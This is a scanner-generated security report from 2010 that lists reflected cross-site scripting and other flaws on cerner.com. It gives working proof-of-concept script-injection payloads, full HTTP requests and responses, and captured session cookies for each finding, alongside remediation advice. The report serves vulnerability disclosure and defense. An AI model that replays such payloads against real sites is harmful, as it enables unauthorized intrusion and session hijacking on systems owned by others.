Report generated by Hoyt LLC Research
at Fri Nov 12 07:37:04 EST 2010.
Cross Site Scripting Reports | Hoyt LLC Research
1. Cross-site scripting (reflected)
1.1. http://cerner.com/ScriptResource.axd [d parameter]
1.2. http://cerner.com/ScriptResource.axd [name of an arbitrarily supplied request parameter]
1.3. http://cerner.com/WebResource.axd [4ad6c">Hoyt.LLC.XSS.PoC parameter]
1.4. http://cerner.com/WebResource.axd [4ad6c">Hoyt.LLC.XSS.PoC.11.10.2010 parameter]
1.5. http://cerner.com/WebResource.axd [4ad6c">dede2f2bdc parameter]
1.6. http://cerner.com/WebResource.axd [d parameter]
1.7. http://cerner.com/WebResource.axd [name of an arbitrarily supplied request parameter]
1.8. http://cerner.com/error.aspx [name of an arbitrarily supplied request parameter]
1.9. http://cerner.com/workarea/csslib/ektronCss.ashx [name of an arbitrarily supplied request parameter]
2. Session token in URL
3. Cross-domain Referer leakage
3.1. http://cerner.com/
3.2. http://cerner.com/WebResource.axd
3.3. http://cerner.com/error.aspx
3.4. http://cerner.com/solutions/Hospitals_and_Health_Systems/Radiology/
3.5. http://cerner.com/solutions/Hospitals_and_Health_Systems/Revenue_Cycle/
3.6. http://cerner.com/solutions/employers/
3.7. http://cerner.com/solutions/individuals_and_families/
3.8. http://cerner.com/solutions/medical_devices/
4. Cross-domain script include
4.1. http://cerner.com/
4.2. http://cerner.com/About_Cerner/
4.3. http://cerner.com/About_Cerner/Careers/
4.4. http://cerner.com/ContactUs/
4.5. http://cerner.com/Default.aspx
4.6. http://cerner.com/GlobalPrivacy/
4.7. http://cerner.com/Privacy/
4.8. http://cerner.com/ScriptResource.axd
4.9. http://cerner.com/Terms_Of_Use/
4.10. http://cerner.com/WebResource.axd
4.11. http://cerner.com/about/Investor_Relations/
4.12. http://cerner.com/blog/
4.13. http://cerner.com/error.aspx
4.14. http://cerner.com/events.aspx
4.15. http://cerner.com/solutions/
4.16. http://cerner.com/solutions/Employers/
4.17. http://cerner.com/solutions/Homecare_Professionals/
4.18. http://cerner.com/solutions/Hospitals_and_Health_Systems/
4.19. http://cerner.com/solutions/Hospitals_and_Health_Systems/Radiology/
4.20. http://cerner.com/solutions/Hospitals_and_Health_Systems/Revenue_Cycle/
4.21. http://cerner.com/solutions/Individuals_and_Families/
4.22. http://cerner.com/solutions/Medical_Devices/
4.23. http://cerner.com/solutions/Pharmacies/
4.24. http://cerner.com/solutions/Physician_Practice/
4.25. http://cerner.com/solutions/Research/
4.26. http://cerner.com/support/
4.27. http://cerner.com/workarea/csslib/ektronCss.ashx
5. Cookie without HttpOnly flag set
6. Email addresses disclosed
6.1. http://cerner.com/GlobalPrivacy/
6.2. http://cerner.com/Privacy/
6.3. http://cerner.com/ScriptResource.axd
6.4. http://cerner.com/Terms_Of_Use/
6.5. http://cerner.com/WebResource.axd
6.6. http://cerner.com/error.aspx
6.7. http://cerner.com/include/js/lib/ddpng.js
6.8. http://cerner.com/workarea/csslib/ektronCss.ashx
7. Content type incorrectly stated
7.1. http://cerner.com/assets/img/home-bgr-blue.jpg
7.2. http://cerner.com/assets/img/home-bgr-green.jpg
7.3. http://cerner.com/assets/img/home-bgr-horz-blue.jpg
7.4. http://cerner.com/assets/img/home-bgr-horz-brown.jpg
7.5. http://cerner.com/assets/img/home-bgr-horz-green.jpg
7.6. http://cerner.com/assets/img/home-bgr-horz-red.jpg
7.7. http://cerner.com/assets/img/home-bgr-horz-teal.jpg
7.8. http://cerner.com/assets/img/home-bgr-horz-yellow.jpg
7.9. http://cerner.com/assets/img/home-bgr-red.jpg
7.10. http://cerner.com/assets/img/home-bgr-teal.jpg
7.11. http://cerner.com/assets/img/home-bgr-yellow.jpg
7.12. http://cerner.com/assets/img/home-bgr.jpg
1. Cross-site scripting (reflected)
next
There are 9 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:- Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
- User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://cerner.com/ScriptResource.axd [d parameter]
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/ScriptResource.axd |
Issue detail
The value of the d request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9565d"style%3d"x%3aexpression(alert(1))"6d1a9d97c92 was submitted in the d parameter. This input was echoed as 9565d"style="x:expression(alert(1))"6d1a9d97c92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ScriptResource.axd?d=9565d"style%3d"x%3aexpression(alert(1))"6d1a9d97c92&t=ffffffffec2d9970 HTTP/1.1 Accept: */* Referer: http://cerner.com/WebResource.axd?4ad6c"><script>alert(1)</script>dede2f2bdc=1 Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: cerner.com Proxy-Connection: Keep-Alive Cookie: EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 03:10:51 GMT Content-Length: 13010
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... recenter@cerner.com?subject=Error%20on%20Cerner.com&body=Error message%3A%20%3CInvalid%20character%20in%20a%20Base-64%20string.%3E%20occurred%20on%20page%3A%20%3Chttp://cerner.com/ScriptResource.axd?d=9565d"style="x:expression(alert(1))"6d1a9d97c92&t=ffffffffec2d9970%3E"> ...[SNIP]...
|
1.2. http://cerner.com/ScriptResource.axd [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/ScriptResource.axd |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcb39"><script>alert(1)</script>e2b5e448ee7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ScriptResource.axd?fcb39"><script>alert(1)</script>e2b5e448ee7=1 HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 11 Nov 2010 23:05:59 GMT Connection: close Content-Length: 13065
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <a href="mailto:clientcarecenter@cerner.com?subject=Error%20on%20Cerner.com&body=Error message%3A%20%3C404 - File Not Found%3E%20occurred%20on%20page%3A%20%3Chttp://cerner.com/ScriptResource.axd?fcb39"><script>alert(1)</script>e2b5e448ee7=1%3E"> ...[SNIP]...
|
1.3. http://cerner.com/WebResource.axd [4ad6c">Hoyt.LLC.XSS.PoC parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/WebResource.axd |
Issue detail
The value of the 4ad6c"><script>alert(1)</script>Hoyt.LLC.XSS.PoC request parameter is copied into the HTML document as plain text between tags. The payload ca030<script>alert(1)</script>66b3a2a3e65 was submitted in the 4ad6c"><script>alert(1)</script>Hoyt.LLC.XSS.PoC parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /WebResource.axd?4ad6c"><script>alert(1)</script>Hoyt.LLC.XSS.PoC=1ca030<script>alert(1)</script>66b3a2a3e65 HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: cerner.com Cookie: EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 03:10:25 GMT Content-Length: 13164
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... </script>Hoyt.LLC.XSS.PoC=1ca030<script>alert(1)</script>66b3a2a3e65%3E"> ...[SNIP]...
|
1.4. http://cerner.com/WebResource.axd [4ad6c">Hoyt.LLC.XSS.PoC.11.10.2010 parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/WebResource.axd |
Issue detail
The value of the 4ad6c"><script>alert(1)</script>Hoyt.LLC.XSS.PoC.11.10.2010 request parameter is copied into the HTML document as plain text between tags. The payload 2b34d<script>alert(1)</script>b058c3ade24 was submitted in the 4ad6c"><script>alert(1)</script>Hoyt.LLC.XSS.PoC.11.10.2010 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /WebResource.axd?4ad6c"><script>alert(1)</script>Hoyt.LLC.XSS.PoC.11.10.2010=12b34d<script>alert(1)</script>b058c3ade24 HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: cerner.com Cookie: EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 03:10:28 GMT Content-Length: 13191
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... </script>Hoyt.LLC.XSS.PoC.11.10.2010=12b34d<script>alert(1)</script>b058c3ade24%3E"> ...[SNIP]...
|
1.5. http://cerner.com/WebResource.axd [4ad6c">dede2f2bdc parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/WebResource.axd |
Issue detail
The value of the 4ad6c"><script>alert(1)</script>dede2f2bdc request parameter is copied into the HTML document as plain text between tags. The payload e90b5<script>alert(1)</script>36200281315 was submitted in the 4ad6c"><script>alert(1)</script>dede2f2bdc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /WebResource.axd?4ad6c"><script>alert(1)</script>dede2f2bdc=1e90b5<script>alert(1)</script>36200281315 HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: cerner.com Cookie: EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 03:10:17 GMT Content-Length: 13150
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... </script>dede2f2bdc=1e90b5<script>alert(1)</script>36200281315%3E"> ...[SNIP]...
|
1.6. http://cerner.com/WebResource.axd [d parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/WebResource.axd |
Issue detail
The value of the d request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a05ec"%20style%3dx%3aexpr/**/ession(alert(1))%203105f7fe920 was submitted in the d parameter. This input was echoed as a05ec" style=x:expr/**/ession(alert(1)) 3105f7fe920 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /WebResource.axd?d=2SBuBLfDQW94yIBtNTMYqg2a05ec"%20style%3dx%3aexpr/**/ession(alert(1))%203105f7fe920&t=633802452069218315 HTTP/1.1 Accept: */* Referer: http://cerner.com/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: cerner.com Proxy-Connection: Keep-Alive Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 03:10:26 GMT Content-Length: 13101
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... subject=Error%20on%20Cerner.com&body=Error message%3A%20%3CInvalid%20character%20in%20a%20Base-64%20string.%3E%20occurred%20on%20page%3A%20%3Chttp://cerner.com/WebResource.axd?d=2SBuBLfDQW94yIBtNTMYqg2a05ec" style=x:expr/**/ession(alert(1)) 3105f7fe920&t=633802452069218315%3E"> ...[SNIP]...
|
1.7. http://cerner.com/WebResource.axd [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/WebResource.axd |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ad6c"><script>alert(1)</script>dede2f2bdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /WebResource.axd?4ad6c"><script>alert(1)</script>dede2f2bdc=1 HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 11 Nov 2010 22:57:27 GMT Connection: close Content-Length: 13053
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <a href="mailto:clientcarecenter@cerner.com?subject=Error%20on%20Cerner.com&body=Error message%3A%20%3C404 - File Not Found%3E%20occurred%20on%20page%3A%20%3Chttp://cerner.com/WebResource.axd?4ad6c"><script>alert(1)</script>dede2f2bdc=1%3E"> ...[SNIP]...
|
1.8. http://cerner.com/error.aspx [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/error.aspx |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdda4"><script>alert(1)</script>46a8fee4fa6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /error.aspx?err=404&cdda4"><script>alert(1)</script>46a8fee4fa6=1 HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:28:26 GMT Content-Length: 13129 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <a href="mailto:clientcarecenter@cerner.com?subject=Error%20on%20Cerner.com&body=Error message%3A%20%3C404 - File Not Found%3E%20occurred%20on%20page%3A%20%3Chttp://cerner.com/error.aspx?err=404&cdda4"><script>alert(1)</script>46a8fee4fa6=1%3E"> ...[SNIP]...
|
1.9. http://cerner.com/workarea/csslib/ektronCss.ashx [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/workarea/csslib/ektronCss.ashx |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69e57"><script>alert(1)</script>4b1b5bdd1fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /workarea/csslib/ektronCss.ashx?69e57"><script>alert(1)</script>4b1b5bdd1fc=1 HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 11 Nov 2010 22:57:23 GMT Connection: close Content-Length: 13078
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... %20on%20Cerner.com&body=Error message%3A%20%3CObject%20reference%20not%20set%20to%20an%20instance%20of%20an%20object.%3E%20occurred%20on%20page%3A%20%3Chttp://cerner.com/workarea/csslib/ektronCss.ashx?69e57"><script>alert(1)</script>4b1b5bdd1fc=1%3E"> ...[SNIP]...
|
2. Session token in URL
previous
next
Summary
Severity: |
Medium |
Confidence: |
Firm |
Host: |
http://cerner.com |
Path: |
/solutions/Hospitals_and_Health_Systems/Radiology/ |
Issue detail
The response contains the following links that appear to contain session tokens:- https://wiki.ucern.com/login.action;jsessionid=E3275621F7967E8E45203CDE24485E18?os_destination=%2Fdisplay%2Fpublic%2FprovisionworkstationHP%2FClinical%2BImaging%2BConformance%2BStatements
Issue background
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
Request
GET /solutions/Hospitals_and_Health_Systems/Radiology/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 11 Nov 2010 22:57:09 GMT Content-Length: 25357 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <li><a href="https://wiki.ucern.com/login.action;jsessionid=E3275621F7967E8E45203CDE24485E18?os_destination=%2Fdisplay%2Fpublic%2FprovisionworkstationHP%2FClinical%2BImaging%2BConformance%2BStatements" title="Clinical Imaging Conforming Statements">View Clinical Imaging Conformance Statements from Cerner</a> ...[SNIP]...
|
3. Cross-domain Referer leakage
previous
next
There are 8 instances of this issue:
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
3.1. http://cerner.com/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/ |
Issue detail
The page was loaded from a URL containing a query string:- http://cerner.com/?langtype=1033
The response contains the following links to other domains:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
